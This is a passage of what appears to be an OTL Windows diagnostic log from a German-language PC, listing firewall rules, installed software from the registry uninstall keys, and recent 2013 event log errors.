"{E484B1B6-C9CC-44A0-9B1A-14E884C1F0F5}" = rport=3702 | protocol=17 | dir=out | svc=fdrespub | app=%systemroot%\system32\svchost.exe |
"{EA8F5F1F-F977-40E7-A979-228DB1386A04}" = lport=2869 | protocol=6 | dir=in | app=system |
"{ECB97293-6157-4B56-A4ED-DFA434334AE6}" = lport=161 | protocol=17 | dir=in | name=druckvorgang |
"{F157BA55-7A62-4FB1-A0B3-8A82A599FA56}" = lport=138 | protocol=17 | dir=in | app=system |
"{F9E44214-6BC0-4487-8EC6-AB7B30018A81}" = lport=139 | protocol=6 | dir=in | app=system |
========== Vista Active Application Exception List ==========
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{02B9C774-B905-41FC-A2D1-75DF4619E895}" = dir=in | app=c:\program files\windows live\messenger\msnmsgr.exe |
"{0A5D1B97-BBE1-495D-BBBF-F30D4F93162D}" = protocol=17 | dir=in | app=c:\program files\steam\steam.exe |
"{0BAF21EF-E9FC-4CF4-93B0-3ED23A7158E8}" = dir=in | app=c:\program files\common files\apple\apple application support\webkit2webprocess.exe |
"{0C32669F-9681-40CE-A1D4-C7AB38968466}" = protocol=6 | dir=out | app=system |
"{389B7691-D2B7-4C32-981C-C0E2E19DB03E}" = dir=in | app=c:\program files\itunes\itunes.exe |
"{50E11D82-CDA2-4E47-AAD9-95823320FC4C}" = protocol=6 | dir=in | app=c:\program files\steam\steamapps\common\lara croft and the guardian of light\lcgol_demo.exe |
"{51A3D040-9C95-42E2-BE71-1B9AD02ED48B}" = protocol=6 | dir=in | app=c:\program files\twonky\twonkyserver\twonkyserver.exe |
"{52E95DAA-933C-4D68-9697-3CF80F64C39A}" = protocol=17 | dir=in | app=c:\program files\hp\hp officejet 6500 e710n-z\bin\devicesetup.exe |
"{54A09723-E23A-4A6F-A840-10DC2ED4C344}" = protocol=6 | dir=in | app=c:\program files\netdrive\ndsvc.exe |
"{63E29624-2FE6-42EB-99F6-33773F75B861}" = protocol=6 | dir=in | app=c:\program files\steam\steam.exe |
"{756C08B9-7CDD-4990-B794-C4ADD80BB032}" = protocol=6 | dir=in | app=c:\program files\microsoft office\office12\onenote.exe |
"{7AF5684D-E528-4F82-926D-674F83F20695}" = dir=in | app=c:\program files\skype\phone\skype.exe |
"{7C6897E3-B4C4-450F-9764-FE373F7CFDAA}" = protocol=17 | dir=in | app=c:\program files\twonky\twonkyserver\twonkyserver.exe |
"{7DF486C3-196E-4F8A-AC7C-222230CD76A3}" = protocol=6 | dir=in | app=c:\program files\mobbcore bcontrol_1_0_809\bcontrolagent.exe |
"{81656EC6-C46F-4AFD-8484-CE9DFE27EB8E}" = protocol=58 | dir=out | name=@firewallapi.dll,-28546 |
"{819D59A3-99E3-4B76-9FAF-F28AE3C434DF}" = dir=in | app=c:\program files\windows live\messenger\wlcsdk.exe |
"{848E79B3-00E7-4552-BF0F-B162002B4C7C}" = protocol=17 | dir=in | app=c:\program files\steam\steamapps\common\lara croft and the guardian of light\lcgol_demo.exe |
"{84DE97A2-5504-4898-A5A1-CEF0EDDE3321}" = protocol=17 | dir=in | app=c:\program files\twonky\twonkyserver\twonkystarter.exe |
"{906D20E7-3A39-4285-974C-590269957501}" = protocol=6 | dir=out | svc=upnphost | app=%systemroot%\system32\svchost.exe |
"{94EA64CE-4D98-4475-985C-235F63CC60FE}" = protocol=17 | dir=in | app=c:\program files\mobbcore bcontrol_1_0_809\bcontrolagent.exe |
"{9544BF85-15F9-44AB-A29D-7AC0463E094B}" = protocol=6 | dir=in | app=c:\program files\hp\hp officejet 6500 e710n-z\bin\hpnetworkcommunicator.exe |
"{96F774E7-DCCB-4B20-9E12-0946056C59C6}" = dir=in | app=c:\program files\cyberlink\powerdvd\powerdvd.exe |
"{9F1D8106-7399-41E8-9482-52ED00FFAED6}" = protocol=1 | dir=in | name=@firewallapi.dll,-28543 |
"{A614BE8C-9BD6-4394-991C-6DACC3AD9742}" = protocol=6 | dir=in | app=c:\program files\hp\hp officejet 6500 e710n-z\bin\devicesetup.exe |
"{A7FE49D8-6A96-4DCB-9FDA-F1F57BB7A8F0}" = protocol=6 | dir=in | app=c:\program files\twonky\twonkyserver\twonkystarter.exe |
"{A9FA9560-6BC2-4BD0-814B-4C3DB20A60E9}" = protocol=1 | dir=out | name=@firewallapi.dll,-28544 |
"{B847FD48-FA6D-4C76-B86F-8F23E7404D85}" = protocol=17 | dir=in | app=c:\program files\netdrive\ndsvc.exe |
"{C2312C03-1D0F-418D-B134-733F7279A5F5}" = protocol=6 | dir=out | app=c:\windows\system32\wudfhost.exe |
"{D78B0574-F8C5-4F89-8149-1AEB518B1E5E}" = protocol=17 | dir=in | app=c:\program files\bonjour\mdnsresponder.exe |
"{E25E6FA1-EDBB-4599-B619-D0A05BF2F11B}" = protocol=17 | dir=in | app=c:\program files\hp\hp officejet 6500 e710n-z\bin\hpnetworkcommunicator.exe |
"{EAAAB938-3FB4-41E7-9EB3-93867BBC6639}" = protocol=58 | dir=in | name=@firewallapi.dll,-28545 |
"{EE7CB5C6-BD08-41F2-9C8C-0F81FD3A9763}" = protocol=17 | dir=in | app=c:\program files\microsoft office\office12\onenote.exe |
"{F8E7FAB1-45F0-4D7B-B5F5-162903729B9C}" = protocol=6 | dir=in | app=c:\program files\bonjour\mdnsresponder.exe |
"{FE806151-3416-42AC-9A96-3634510E4ABC}" = protocol=6 | dir=out | svc=upnphost | app=c:\windows\system32\svchost.exe |
"TCP Query User{1C44A64E-7EB0-4B06-93EA-2D4268F1C6C4}C:\users\ant\appdata\local\temp\7zs6ca7\enterprisedu.exe" = protocol=6 | dir=in | app=c:\users\ant\appdata\local\temp\7zs6ca7\enterprisedu.exe |
"TCP Query User{422D3EAE-E423-4344-B580-6B7A3F5818B0}C:\program files\remotedesktopserver\remotedesktopserver.exe" = protocol=6 | dir=in | app=c:\program files\remotedesktopserver\remotedesktopserver.exe |
"TCP Query User{49FA6209-ED38-4394-A976-664D2601A759}C:\mirc\mirc.exe" = protocol=6 | dir=in | app=c:\mirc\mirc.exe |
"TCP Query User{54F32131-E99A-4B90-9163-52790E026ACF}C:\users\ant\appdata\local\temp\7zs4352\enterprisedu.exe" = protocol=6 | dir=in | app=c:\users\ant\appdata\local\temp\7zs4352\enterprisedu.exe |
"TCP Query User{99B64360-59F8-4411-A29D-5EFC517B40CF}C:\mirc\mirc.exe" = protocol=6 | dir=in | app=c:\mirc\mirc.exe |
"TCP Query User{9A951EC7-7B4B-48ED-8239-26A5AFF9EF09}C:\program files\myphoneexplorer\myphoneexplorer.exe" = protocol=6 | dir=in | app=c:\program files\myphoneexplorer\myphoneexplorer.exe |
"TCP Query User{9C81CDE5-82E8-4636-A73D-1A6A092697FF}C:\program files\philips\mediamanager\twonkymanager.exe" = protocol=6 | dir=in | app=c:\program files\philips\mediamanager\twonkymanager.exe |
"TCP Query User{AD32AB7E-B300-488E-B15C-C2B182DAB005}C:\program files\mobbcore bcontrol_1_0_809\bcontrolagent.exe" = protocol=6 | dir=in | app=c:\program files\mobbcore bcontrol_1_0_809\bcontrolagent.exe |
"TCP Query User{BF26C7E1-3F10-4A71-8C98-5B1C0B422B22}C:\users\ant\appdata\local\temp\7zs33f7\enterprisedu.exe" = protocol=6 | dir=in | app=c:\users\ant\appdata\local\temp\7zs33f7\enterprisedu.exe |
"TCP Query User{CC5AEAA9-C7DE-4782-AB51-DB1C20F0E021}C:\program files\philips\mediamanager\twonkyrenderer.exe" = protocol=6 | dir=in | app=c:\program files\philips\mediamanager\twonkyrenderer.exe |
"TCP Query User{D2E5FFA7-7229-473F-93F7-2CD32C4E4C8F}C:\program files\twonky\twonkyserver\twonkyserver.exe" = protocol=6 | dir=in | app=c:\program files\twonky\twonkyserver\twonkyserver.exe |
"TCP Query User{F131C037-70F7-4E1B-B8B7-E614FACAC880}C:\program files\hp\hp officejet 6500 e710n-z\bin\hpnetworkcommunicator.exe" = protocol=6 | dir=in | app=c:\program files\hp\hp officejet 6500 e710n-z\bin\hpnetworkcommunicator.exe |
"UDP Query User{012AFCFB-BD0A-40C9-B628-5B7B63313513}C:\program files\twonky\twonkyserver\twonkyserver.exe" = protocol=17 | dir=in | app=c:\program files\twonky\twonkyserver\twonkyserver.exe |
"UDP Query User{04D70229-8EC9-4E6C-8FA7-E4930955B82F}C:\users\ant\appdata\local\temp\7zs6ca7\enterprisedu.exe" = protocol=17 | dir=in | app=c:\users\ant\appdata\local\temp\7zs6ca7\enterprisedu.exe |
"UDP Query User{0D93800B-6DA5-4E7F-B294-18BA28D202CF}C:\users\ant\appdata\local\temp\7zs33f7\enterprisedu.exe" = protocol=17 | dir=in | app=c:\users\ant\appdata\local\temp\7zs33f7\enterprisedu.exe |
"UDP Query User{1754187E-B36D-4F86-B60B-94CBA11C63F8}C:\program files\myphoneexplorer\myphoneexplorer.exe" = protocol=17 | dir=in | app=c:\program files\myphoneexplorer\myphoneexplorer.exe |
"UDP Query User{B21A7ADF-A21C-4F06-84B4-C03ABC2BF0A7}C:\program files\philips\mediamanager\twonkyrenderer.exe" = protocol=17 | dir=in | app=c:\program files\philips\mediamanager\twonkyrenderer.exe |
"UDP Query User{BA919B03-07EC-4F47-895D-7FA00128CCB8}C:\program files\mobbcore bcontrol_1_0_809\bcontrolagent.exe" = protocol=17 | dir=in | app=c:\program files\mobbcore bcontrol_1_0_809\bcontrolagent.exe |
"UDP Query User{C2282B50-D257-42B4-8E3F-A9427757132F}C:\mirc\mirc.exe" = protocol=17 | dir=in | app=c:\mirc\mirc.exe |
"UDP Query User{C7D5BAF4-10A1-4D73-8D53-74E7C831C723}C:\mirc\mirc.exe" = protocol=17 | dir=in | app=c:\mirc\mirc.exe |
"UDP Query User{DF097255-0F5C-45B0-81F7-FAEAF073FF5C}C:\program files\remotedesktopserver\remotedesktopserver.exe" = protocol=17 | dir=in | app=c:\program files\remotedesktopserver\remotedesktopserver.exe |
"UDP Query User{E4201583-CF21-48F5-9888-A1ED5E7215F8}C:\program files\philips\mediamanager\twonkymanager.exe" = protocol=17 | dir=in | app=c:\program files\philips\mediamanager\twonkymanager.exe |
"UDP Query User{FA82C556-4213-412C-9542-F1389C34D65C}C:\users\ant\appdata\local\temp\7zs4352\enterprisedu.exe" = protocol=17 | dir=in | app=c:\users\ant\appdata\local\temp\7zs4352\enterprisedu.exe |
"UDP Query User{FF74768D-8101-423A-AB2E-BE1C00960A59}C:\program files\hp\hp officejet 6500 e710n-z\bin\hpnetworkcommunicator.exe" = protocol=17 | dir=in | app=c:\program files\hp\hp officejet 6500 e710n-z\bin\hpnetworkcommunicator.exe |
========== HKEY_LOCAL_MACHINE Uninstall List ==========
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}" = PDFCreator
"{002D9D5E-29BA-3E6D-9BC4-3D7D6DBC735C}" = Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148
"{03655260-E933-4DD9-939B-46E8ABCB1184}" = 11589 DVB-T x86
"{048298C9-A4D3-490B-9FF9-AB023A9238F3}" = Steam
"{052FDD78-A6EA-3187-8386-C82F4CA3A929}" = Microsoft .NET Framework 3.5 Language Pack SP1 - deu
"{07629207-FAA0-4F1A-8092-BF5085BE511F}" = Unterstützungsdateien für das Microsoft SQL Server-Setup (Englisch)
"{0840B4D6-7DD1-4187-8523-E6FC0007EFB7}" = Windows Live ID Sign-in Assistant
"{0E64B098-8018-4256-BA23-C316A43AD9B0}" = QuickTime
"{11083C7A-D0D6-4DA4-8C3A-74B8389EC07B}" = ATI Catalyst Registration
"{11316260-6666-467B-AC34-183FCB5D4335}" = Acer Mobility Center Plug-In
"{116FF17B-1A30-4FC2-9B01-5BC5BD46B0B3}" = Acer eLock Management
"{1577A05B-EE62-4BBC-9DB7-FE748FA44EC2}" = NTI CD & DVD-Maker
"{1598034D-7147-432C-8CA8-888E0632D124}" = NTI Backup NOW! 4.7
"{1EBD33A9-2AAF-4CE6-8D62-9D3634C8B43B}" = HP Officejet 6500 E710n-z - Grundlegende Software für das Gerät
"{205C6BDD-7B73-42DE-8505-9A093F35A238}" = Windows Live-Uploadtool
"{22B775E7-6C42-4FC5-8E10-9A5E3257BD94}" = MSVCRT
"{26A24AE4-039D-4CA4-87B4-2F83216013FF}" = Java(TM) 6 Update 21
"{28006915-2739-4EBE-B5E8-49B25D32EB33}" = Atheros for Acer Driver v7.2.0.208_Foxconn Installation Program
"{2EEC2A94-7204-45C6-93BB-67EAEB19E4D6}" = Safari
"{2EFA4E4C-7B5F-48F7-A1C0-1AA882B7A9C3}" = HP Update
"{3921A67A-5AB1-4E48-9444-C71814CF3027}" = VCRedistSetup
"{3C3901C5-3455-3E0A-A214-0B093A5070A6}" = Microsoft .NET Framework 4 Client Profile
"{41E654A9-26D0-4EAC-854B-0FA824FFFABB}" = Windows Live Messenger
"{459699C3-9430-4381-964B-4248D87B49F9}" = Apple Mobile Device Support
"{45C56AA7-ED1B-4800-A97F-EDDF3F3520B1}" = Apple Application Support
"{4A03706F-666A-4037-7777-5F2748764D10}" = Java Auto Updater
"{4EF8BE6A-899C-4196-94E7-297C5F7A203E}" = pdfforge Toolbar v1.1.1
"{50120000-1105-0000-0000-0000000FF1CE}" = Microsoft Office 2007 Primary Interop Assemblies
"{56C049BE-79E9-4502-BEA7-9754A3E60F9B}" = neroxml
"{58E5844B-7CE2-413D-83D1-99294BF6C74F}" = Acer ePower Management
"{5968F27A-66E6-171E-5311-0A74D74AAD9B}" = ATI Catalyst Install Manager
"{5EE7D259-D137-4438-9A5F-42F432EC0421}" = VC80CRTRedist - 8.0.50727.4053
"{5FC68772-6D56-41C6-9DF1-24E868198AE6}" = Windows Live Call
"{5FCCD531-1B38-4A94-924C-127F722F1031}" = Nero 8
"{5FD89EA1-99C2-40EE-BBF5-20F8991ED756}" = Catalyst Control Center - Branding
"{65DA2EC9-0642-47E9-AAE2-B5267AA14D75}" = Activation Assistant for the 2007 Microsoft Office suites
"{6811CAA0-BF12-11D4-9EA1-0050BAE317E1}" = PowerDVD
"{6AFCA4E1-9B78-3640-8F72-A7BF33448200}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729
"{6F7EA6CA-79F4-44A0-A370-8E82BB16534A}" = NTI Shadow
"{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}" = Microsoft Visual C++ 2005 Redistributable
"{7299052b-02a4-4627-81f2-1818da5d550d}" = Microsoft Visual C++ 2005 Redistributable
"{770657D0-A123-3C07-8E44-1C83EC895118}" = Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053
"{77F8A71E-3515-4832-B8B2-2F1EDBD2E0F1}" = Bing Bar
"{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}" = Apple Software Update
"{79155F2B-9895-49D7-8612-D92580E0DE5B}" = Bonjour
"{7AB86D35-DF3B-407F-B43E-468345DABF29}" = SL-6555-SBK
"{7CC673E7-5271-409D-B196-BB76DA60300B}" = Twonky Windows Components
"{7ED4E9AB-9B5D-5380-9AB7-2865CA1DA0DB}" = AMD Fuel
"{7FB12670-0F93-4E1E-B2F5-4F339199A03A}" = Microsoft SQL Server Native Client
"{849A32C3-E75A-4791-9B11-E568BA3525A4}" = Microsoft SQL Server VSS Writer
"{85092B90-AEB2-2E30-0EF1-432EC61F6BD1}" = Catalyst Control Center InstallProxy
"{86B247F9-1D5E-CCC6-3280-71486D9A4E70}" = ATI Stream SDK v2 Developer
"{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}" = Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570
"{88410D8F-8529-492B-B556-2394A29B811B}" = Broadcom Driver v4.102.15.63_Foxconn Installation Program
"{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}" = Microsoft Silverlight
"{8ACC73AA-6511-7C55-B1A9-8E5D1DEAFAA3}" = The Lord of the Rings FREE Trial
"{90120000-0016-0407-0000-0000000FF1CE}" = Microsoft Office Excel MUI (German) 2007
"{90120000-0016-0407-0000-0000000FF1CE}_HOMESTUDENTR_{DB2ACBD1-65B1-4FC5-881E-4E75C668E7E2}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-0018-0407-0000-0000000FF1CE}" = Microsoft Office PowerPoint MUI (German) 2007
"{90120000-0018-0407-0000-0000000FF1CE}_HOMESTUDENTR_{DB2ACBD1-65B1-4FC5-881E-4E75C668E7E2}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-001B-0407-0000-0000000FF1CE}" = Microsoft Office Word MUI (German) 2007
"{90120000-001B-0407-0000-0000000FF1CE}_HOMESTUDENTR_{DB2ACBD1-65B1-4FC5-881E-4E75C668E7E2}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-001F-0407-0000-0000000FF1CE}" = Microsoft Office Proof (German) 2007
"{90120000-001F-0407-0000-0000000FF1CE}_HOMESTUDENTR_{928D7B99-2BEA-49F9-83B8-20FA57860643}" = Microsoft Office Proofing Tools 2007 Service Pack 3 (SP3)
"{90120000-001F-0409-0000-0000000FF1CE}" = Microsoft Office Proof (English) 2007
"{90120000-001F-0409-0000-0000000FF1CE}_HOMESTUDENTR_{1FF96026-A04A-4C3E-B50A-BB7022654D0F}" = Microsoft Office Proofing Tools 2007 Service Pack 3 (SP3)
"{90120000-001F-040C-0000-0000000FF1CE}" = Microsoft Office Proof (French) 2007
"{90120000-001F-040C-0000-0000000FF1CE}_HOMESTUDENTR_{71F055E8-E2C6-4214-BB3D-BFE03561B89E}" = Microsoft Office Proofing Tools 2007 Service Pack 3 (SP3)
"{90120000-001F-0410-0000-0000000FF1CE}" = Microsoft Office Proof (Italian) 2007
"{90120000-001F-0410-0000-0000000FF1CE}_HOMESTUDENTR_{A23BFC95-4A73-410F-9248-4C2B48E38C49}" = Microsoft Office Proofing Tools 2007 Service Pack 3 (SP3)
"{90120000-002C-0407-0000-0000000FF1CE}" = Microsoft Office Proofing (German) 2007
"{90120000-006E-0407-0000-0000000FF1CE}" = Microsoft Office Shared MUI (German) 2007
"{90120000-006E-0407-0000-0000000FF1CE}_HOMESTUDENTR_{A6353E8F-5B8D-47CC-8737-DFF032ED3973}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-00A1-0407-0000-0000000FF1CE}" = Microsoft Office OneNote MUI (German) 2007
"{90120000-00A1-0407-0000-0000000FF1CE}_HOMESTUDENTR_{DB2ACBD1-65B1-4FC5-881E-4E75C668E7E2}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90140000-0019-0407-0000-0000000FF1CE}" = Microsoft Office Publisher MUI (German) 2010
"{90140000-0019-0407-0000-0000000FF1CE}_Office14.PUBLISHERR_{69E54534-4569-4639-89E9-305B60A11601}" = Microsoft Office 2010 Service Pack 1 (SP1)
"{90140000-001F-0407-0000-0000000FF1CE}" = Microsoft Office Proof (German) 2010
"{90140000-001F-0407-0000-0000000FF1CE}_Office14.PUBLISHERR_{65A2328E-FDFB-4CA3-8582-357EA6825FEA}" = Microsoft Office 2010 Service Pack 1 (SP1)
"{90140000-001F-0409-0000-0000000FF1CE}" = Microsoft Office Proof (English) 2010
"{90140000-001F-0409-0000-0000000FF1CE}_Office14.PUBLISHERR_{99ACCA38-6DD3-48A8-96AE-A283C9759279}" = Microsoft Office 2010 Service Pack 1 (SP1)
"{90140000-001F-040C-0000-0000000FF1CE}" = Microsoft Office Proof (French) 2010
"{90140000-001F-040C-0000-0000000FF1CE}_Office14.PUBLISHERR_{46298F6A-1E7E-4D4A-B5F5-106A4F0E48C6}" = Microsoft Office 2010 Service Pack 1 (SP1)
"{90140000-001F-0410-0000-0000000FF1CE}" = Microsoft Office Proof (Italian) 2010
"{90140000-001F-0410-0000-0000000FF1CE}_Office14.PUBLISHERR_{C0743197-FFEE-4C19-BAEB-8F7437DC4C8A}" = Microsoft Office 2010 Service Pack 1 (SP1)
"{90140000-002C-0407-0000-0000000FF1CE}" = Microsoft Office Proofing (German) 2010
"{90140000-002C-0407-0000-0000000FF1CE}_Office14.PUBLISHERR_{4275FB46-ABDF-4456-876C-17CF64294D9A}" = Microsoft Office 2010 Service Pack 1 (SP1)
"{90140000-006E-0407-0000-0000000FF1CE}" = Microsoft Office Shared MUI (German) 2010
"{90140000-006E-0407-0000-0000000FF1CE}_Office14.PUBLISHERR_{98EDFD9F-EA76-40CC-BCE9-92C69413F65B}" = Microsoft Office 2010 Service Pack 1 (SP1)
"{90140000-2005-0000-0000-0000000FF1CE}" = Microsoft Office File Validation Add-In
"{90A40407-6000-11D3-8CFE-0150048383C9}" = Microsoft Office 2003 Web Components
"{91120000-002F-0000-0000-0000000FF1CE}" = Microsoft Office Home and Student 2007
"{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{91140000-0019-0000-0000-0000000FF1CE}" = Microsoft Office Publisher 2010
"{91140000-0019-0000-0000-0000000FF1CE}_Office14.PUBLISHERR_{047B0968-E622-4FAA-9B4B-121FA109EDDE}" = Microsoft Office 2010 Service Pack 1 (SP1)
"{95120000-00B9-0409-0000-0000000FF1CE}" = Microsoft Application Error Reporting
"{99E862CC-6F69-4D39-99AA-DBF71BF3B585}" = OpenOffice.org 3.1
"{9A25302D-30C0-39D9-BD6F-21E6EC160475}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
"{9BE518E6-ECC6-35A9-88E4-87755C07200F}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
"{A5633652-3795-4829-BB0B-644F0279E279}" = Acer eDataSecurity Management
"{A77255C4-AFCB-44A3-BF0F-2091A71FFD9E}" = Acer Crystal Eye Webcam 2.0.9.2
"{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}" = Google Update Helper
"{A939D341-5A04-4E0A-BB55-3E65B386432D}" = Microsoft Office Small Business Connectivity Components
"{AB6097D9-D722-4987-BD9E-A076E2848EE2}" = Acer Empowering Technology
"{AC4C38FD-A54C-4CA5-92EE-D983CD81293E}" = Microsoft Xbox 360 Accessories 1.2
"{AC76BA86-7AD7-1031-7B44-A95000000001}" = Adobe Reader 9.5.5 - Deutsch
"{AC76BA86-7AD7-5464-3428-900000000004}" = Spelling Dictionaries Support For Adobe Reader 9
"{AEBBFC67-7A03-4DF3-9E71-BA5C9EB4FBEF}" = MobileMe Control Panel
"{B0261E53-B6F1-474A-864B-E7C3CBF468E0}" = iTunes
"{B3276CB1-20B6-4AF9-AAEC-E72C83816495}" = IKEA Home Planner
"{C06554A1-2C1E-4D20-B613-EE62C79927CC}" = Acer eNet Management
"{C7EA1AF1-F908-0832-AA52-5EDBE128FD6B}" = ccc-core-static
"{CA6BCA2F-EDEB-408F-850B-31404BE16A61}" = I.R.I.S. OCR
"{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}" = Microsoft .NET Framework 3.5 SP1
"{CE386A4E-D0DA-4208-8235-BCE43275C694}" = LightScribe 1.4.142.1
"{CE65A9A0-9686-45C6-9098-3C9543A412F0}" = Acer eSettings Management
"{D642E38E-0D24-486C-9A2D-E316DD696F4B}" = Microsoft XML Parser
"{E10DB5DA-E576-40EA-A7FC-1CB2A7B283A6}" = NVIDIA PhysX
"{E1640DA5-89B4-4F52-B15D-5DA3D14F29D4}" = LG USB Modem Drivers
"{E28B1E6F-E0AA-4228-AB89-DB4A0C89D426}" = AVerTV
"{E9D4FBA9-FB46-A5CE-F52F-516C4B8F0373}" = ccc-utility
"{EB0E062C-575D-8154-2682-C84EF432CCF0}" = Catalyst Control Center Graphics Previews Common
"{ED00D08A-3C5F-488D-93A0-A04F21F23956}" = Windows Live Communications Platform
"{EE7257A2-39A2-4D2F-9DAC-F9F25B8AE1D8}" = Skype™ 5.10
"{EEA54973-AFC8-21C8-1414-246AA9435890}" = CCC Help English
"{EFBC0CB1-AFFD-4E74-ACEF-42099F1D49C3}" = HP Officejet 6500 E710n-z Hilfe
"{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}" = Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219
"{F0E12BBA-AD66-4022-A453-A1C8A0C4D570}" = Microsoft Choice Guard
"{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}" = Realtek High Definition Audio Driver
"{F1FCC8AD-0F88-4D77-8530-0FBB088485F1}" = WEB.DE Update
"{F40BBEC7-C2A4-4A00-9B24-7A055A2C5262}" = Microsoft Office Live Add-in 1.5
"{F8FF18EE-264A-43FD-B2F6-5EAD40798C2F}" = Windows Live Essentials
"{FB0C267C-8B4F-4867-8161-A6A3B66D42C1}" = Marketsplash Schnellzugriffe
"{FB91E774-867B-4567-ACE7-8144EF036068}" = Olympus Digital Wave Player
"Activation Assistant for the 2007 Microsoft Office suites" = Activation Assistant for the 2007 Microsoft Office suites
"Adobe Flash Player ActiveX" = Adobe Flash Player 11 ActiveX
"AVerMedia A835 USB TV Tuner" = AVerMedia A835 USB TV Tuner 8.0.0.43
"Avira AntiVir Desktop" = Avira Free Antivirus
"AVMFBox" = AVM FRITZ!Box Dokumentation
"AVMFBoxPrinter" = AVM FRITZ!Box Druckeranschluss
"CCleaner" = CCleaner
"CNXT_MODEM_HDAUDIO_VEN_14F1&DEV_2BFAOR2C06_118" = HDAUDIO Soft Data Fax Modem with SmartCP
"CornelsenSTVP72" = Cornelsen Stoffverteilungsplaner 7.2
"Deutschbuch Arbeitsblattgenerator" = Deutschbuch Arbeitsblattgenerator
"DivX Setup.divx.com" = DivX-Setup
"Druckschriften Nord_is1" = Pelikan Schulschriften
"Free YouTube to MP3 Converter_is1" = Free YouTube to MP3 Converter version 3.2
"Google Chrome" = Google Chrome
"GridVista" = Acer GridVista
"HOMESTUDENTR" = Microsoft Office Home and Student 2007
"InstallShield_{1577A05B-EE62-4BBC-9DB7-FE748FA44EC2}" = NTI CD & DVD-Maker
"InstallShield_{1598034D-7147-432C-8CA8-888E0632D124}" = NTI Backup NOW! 4.7
"InstallShield_{6F7EA6CA-79F4-44A0-A370-8E82BB16534A}" = NTI Shadow
"InstallShield_{E28B1E6F-E0AA-4228-AB89-DB4A0C89D426}" = AVerTV
"KLiteCodecPack_is1" = K-Lite Codec Pack 8.0.0 (Full)
"LManager" = Launch Manager
"Malwarebytes' Anti-Malware_is1" = Malwarebytes' Anti-Malware Version 1.51.2.1300
"MediaManager" = MediaManager
"Microsoft .NET Framework 3.5 Language Pack SP1 - deu" = Microsoft .NET Framework 3.5 Language Pack SP1 - DEU
"Microsoft .NET Framework 3.5 SP1" = Microsoft .NET Framework 3.5 SP1
"Microsoft .NET Framework 4 Client Profile" = Microsoft .NET Framework 4 Client Profile
"Mozilla Thunderbird (2.0.0.24)" = Mozilla Thunderbird (2.0.0.24)
"MPE" = MyPhoneExplorer
"NetDrive" = NetDrive
"Office14.PUBLISHERR" = Microsoft Publisher 2010
"ownCloud" = ownCloud
"Picasa 3" = Picasa 3
"PriceGong" = PriceGong 2.6.11
"RemoteDesktopServer" = RemoteDesktopServer
"Rossmann Fotowelt Software" = Rossmann Fotowelt Software 4.9
"SCHLECKER Foto Digital Service" = SCHLECKER Foto Digital Service
"Schroedel Arbeitsblätter" = Schroedel Arbeitsblätter
"Schulausgangsschrift SAS_is1" = Pelikan Schulschriften
"Steam App 35150" = Lara Croft and the Guardian of Light Demo
"Steam App 48010" = LIMBO Demo
"SynTPDeinstKey" = Synaptics Pointing Device Driver
"Trine 2_is1" = Trine 2
"Uninstall_is1" = Uninstall 1.0.0.1
"VLC media player" = VLC media player 0.9.9
"WEB.DE Update" = WEB.DE Update
"WinLiveSuite_Wave3" = Windows Live Essentials
"WinRAR archiver" = WinRAR
========== HKEY_CURRENT_USER Uninstall List ==========
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"17d33ce3121ed6e5" = Das Mathe Programm
"Game Organizer" = GameXN GO
"JNLP" = JNLP
"Lumines - Puzzle Fusion" = Lumines - Puzzle Fusion
========== Last 20 Event Log Errors ==========
[ Application Events ]
Error - 28.05.2013 01:59:52 | Computer Name = ant-PC | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: m->NextScheduledEvent 5817527
Error - 28.05.2013 01:59:52 | Computer Name = ant-PC | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: m->NextScheduledSPRetry 5817527
Error - 28.05.2013 02:04:07 | Computer Name = ant-PC | Source = WinMgmt | ID = 10
Description =
Error - 28.05.2013 08:04:24 | Computer Name = ant-PC | Source = EventSystem | ID = 4621
Description =
Error - 28.05.2013 13:26:55 | Computer Name = ant-PC | Source = WinMgmt | ID = 10
Description =
Error - 30.05.2013 15:05:48 | Computer Name = ant-PC | Source = WinMgmt | ID = 10
Description =
Error - 02.06.2013 08:16:52 | Computer Name = ant-PC | Source = WinMgmt | ID = 10
Description =
Error - 02.06.2013 08:58:42 | Computer Name = ant-PC | Source = WinMgmt | ID = 10
Description =
Error - 02.06.2013 11:09:38 | Computer Name = ant-PC | Source = Application Error | ID = 1000
Description = Fehlerhafte Anwendung SynTPEnh.exe, Version 10.0.15.0, Zeitstempel
0x46e19971, fehlerhaftes Modul SynTPEnh.exe, Version 10.0.15.0, Zeitstempel 0x46e19971,
Ausnahmecode 0xc0000409, Fehleroffset 0x000289dc, Prozess-ID 0x10b8, Anwendungsstartzeit
01ce5f914251a286.
Error - 02.06.2013 11:12:37 | Computer Name = ant-PC | Source = WinMgmt | ID = 10
Description =
[ OSession Events ]
